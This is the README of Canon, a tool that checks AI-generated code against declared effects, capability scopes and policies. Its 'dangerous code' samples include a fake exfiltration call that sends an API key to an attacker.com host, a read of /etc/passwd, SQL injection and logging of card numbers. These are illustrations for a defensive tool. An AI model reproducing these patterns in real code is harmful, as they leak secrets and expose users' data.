Skip to content

WarforgeTech/canon

Canon

AI-written, machine-verified, human-optional.

Canon is for teams building with AI agents who are tired of one truth:

AI-generated code is fast — but it has ambient authority. One "helpful" change can silently add network calls, leak secrets to logs, or widen permissions… and you won't notice until prod (or worse).

Canon flips the model. Instead of trusting the AI's output, you make the AI write inside a machine-checkable contract:

  • Every side effect is explicit (network, DB, filesystem, logging)
  • Every side effect is capability-gated (scoped permissions, no ambient authority)
  • Policies block unsafe behavior before code is generated
  • Builds are deterministic and auditable (what changed, what authority expanded, what rules were violated)

In practice, Canon lets you run background agents with confidence — because they can refactor and extend systems, but they cannot expand what the system is allowed to do without tripping validation/policy gates.

New to Canon? Start with the Tutorial — you'll see real-world value in minutes by watching Canon block a "reasonable" AI mistake (like logging PII) before it ships.


The 10-second why

Traditional code: Code runs with ambient authority → review is your only guardrail.

Canon: IR validates effects + caps → policies approve → code is generated → tests run. If an agent tries to exceed permissions (wrong host, wrong DB collection, logging PII), the build fails.


Why Canon?

The Problem: AI Code Without Guardrails

When AI generates traditional code, you're trusting it blindly:

# AI generates this - what could go wrong?
import requests, os

def fetch_user_data(user_id):
    api_key = os.environ.get("API_KEY")  # Reads any env var
    response = requests.get(              # Can call ANY URL
        f"https://{user_id}.attacker.com/exfil",  # Data exfiltration!
        headers={"X-Key": api_key}
    )
    with open("/etc/passwd", "r") as f:   # Filesystem access!
        return f.read()

Problems with AI-generated traditional code:

  • No visibility into what the AI decided or why
  • Ambient authority - code can access anything
  • Side effects are implicit and invisible
  • No compile-time safety checks
  • No confidence scores or alternatives considered

The Solution: Canon's Verified AI Code

Canon makes every side effect explicit and capability-gated:

{
  "effects": {
    "http_get": {
      "name": "net.http",
      "inputs": [{"kind": "String"}],
      "output": {"kind": "HttpResponse"}
    }
  },
  "capabilities": {
    "cap_http": {
      "kind": "net.http",
      "scope": { "hosts": ["api.example.com"] },
      "revocable": true
    }
  }
}

What Canon guarantees:

  • Every side effect is declared and authorized
  • Capability scopes limit what code can touch
  • AI provenance tracks origin and confidence
  • Policy gates catch violations at compile time
  • Deterministic, reproducible builds

Getting Started

Prerequisites

  • Go 1.22+ - For building the Canon CLI
  • Node.js 18+ - For running generated TypeScript
  • npm - For TypeScript dependencies

Installation

# Clone the repository
git clone https://github.com/WarforgeTech/canon.git
cd canon

# Build the CLI
make build

# Verify installation
./bin/canon --help

Your First Canon Program

1. Run the hello world example:

./bin/canon build examples/hello/hello.canon.json

Output:

Building: examples/hello/hello.canon.json

[1/4] Validating...
  Validation: PASSED

[2/4] Checking policies...
  Policy check: PASSED

[3/4] Generating code...
  Output: ./out
  Code generation: PASSED

[4/4] Running tests...
  Tests: PASSED (2/2)

Build: SUCCESS

2. See the generated TypeScript:

cat out/hello.ts
// Generated by Canon codegen - DO NOT EDIT
import { Host } from "../runtime-ts/effects";

export async function hello(host: Host, input: Record<string, unknown>): Promise<unknown> {
  const n_name = input["name"];
  const n_prefix = "Hello, ";
  const n_suffix = "!";
  const n_join1 = (n_prefix + n_name);
  const n_join2 = (n_join1 + n_suffix);
  return n_join2;
}

3. Try the HTTP service example with effects:

./bin/canon build examples/http-service/service.canon.json

4. See capability enforcement in action:

./bin/canon validate examples/policy-demo/violation.canon.json

Output:

Error: host 'malicious.com' not allowed by capability 'cap_http' (allowed: [api.example.com])

Real-World Example: Secure Payment Processing

This example shows why Canon matters for production AI code.

Traditional AI-Generated Code (Dangerous)

# AI generates payment code - scary!
def process_payment(user_id, amount):
    card = db.query(f"SELECT * FROM cards WHERE user={user_id}")  # SQL injection!
    stripe.charge(card.number, amount)  # Can charge any amount!
    log.info(f"Charged card {card.number}")  # Logs sensitive data!

Canon Payment Service (Secure by Construction)

{
  "effects": {
    "payment_charge": {
      "name": "payment.charge",
      "inputs": [{"kind": "PaymentRequest"}],
      "output": {"kind": "PaymentResult"}
    }
  },
  "capabilities": {
    "cap_payment": {
      "kind": "payment.charge",
      "scope": {
        "max_amount_cents": 10000,
        "currencies": ["USD"],
        "accounts": ["acct_prod_main"]
      },
      "revocable": true
    }
  },
  "policies": [
    { "id": "payment_safety", "path": "policies/payment.rego" }
  ]
}

With Canon:

  • Capability limits charges to $100 max
  • Only USD currency allowed
  • Bound to specific merchant account
  • Policy prevents logging card numbers
  • Full audit trail of AI decisions
  • Compile-time rejection of unsafe patterns

CLI Reference

# Validate schema, types, effects, and capabilities
canon validate <file.canon.json>

# Run OPA/Rego safety policies
canon policy <file.canon.json>

# Generate TypeScript code
canon gen <file.canon.json> --target ts --out ./out

# Run golden tests
canon test <file.canon.json>

# Full pipeline: validate -> policy -> gen -> test
canon build <file.canon.json>

Flags

Flag Description
--verbose, -v Show detailed output
--json Output as JSON
--out, -o Output directory (default: ./out)
--skip-tests Skip test execution

How It Works

+------------------------------------------------------------------+
|                       Canon Pipeline                              |
+------------------------------------------------------------------+
|                                                                   |
|  .canon.json  -->  Validate  -->  Policy  -->  Codegen  -->  TS  |
|                       |            |              |               |
|                       v            v              v               |
|                    Types       OPA/Rego      TypeScript           |
|                    Effects     Safety        + Runtime            |
|                    Caps        Gates         + Tests              |
|                                                                   |
+------------------------------------------------------------------+

Validation Checks

  • JSON Schema validation
  • Type checking (params, returns, struct fields)
  • Effect/capability enforcement
  • DAG cycle detection
  • AI provenance validation

Policy Gates

  • Network domain allowlists
  • Filesystem write restrictions
  • Secret access controls
  • AI confidence thresholds

Examples

Example Description
hello Pure function, no effects
http-service HTTP calls with capability scoping
enum-demo Pattern matching on enum types
data-pipeline List operations (map, filter, fold)
policy-demo Demonstrates policy violations

Dialects

Canon uses a dialect system for extensibility:

Dialect Purpose
core/1.0 Types, functions, control flow
effect/1.0 Effect declarations and checking
cap/1.0 Capability model and grants
resource/1.0 Databases, queues, secrets, endpoints
policy/1.0 Policy blocks (Rego evaluation)
test/1.0 Property tests and golden tests
ai/1.0 Provenance, confidence, alternatives

Documentation


License

MIT

About

No description, website, or topics provided.

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors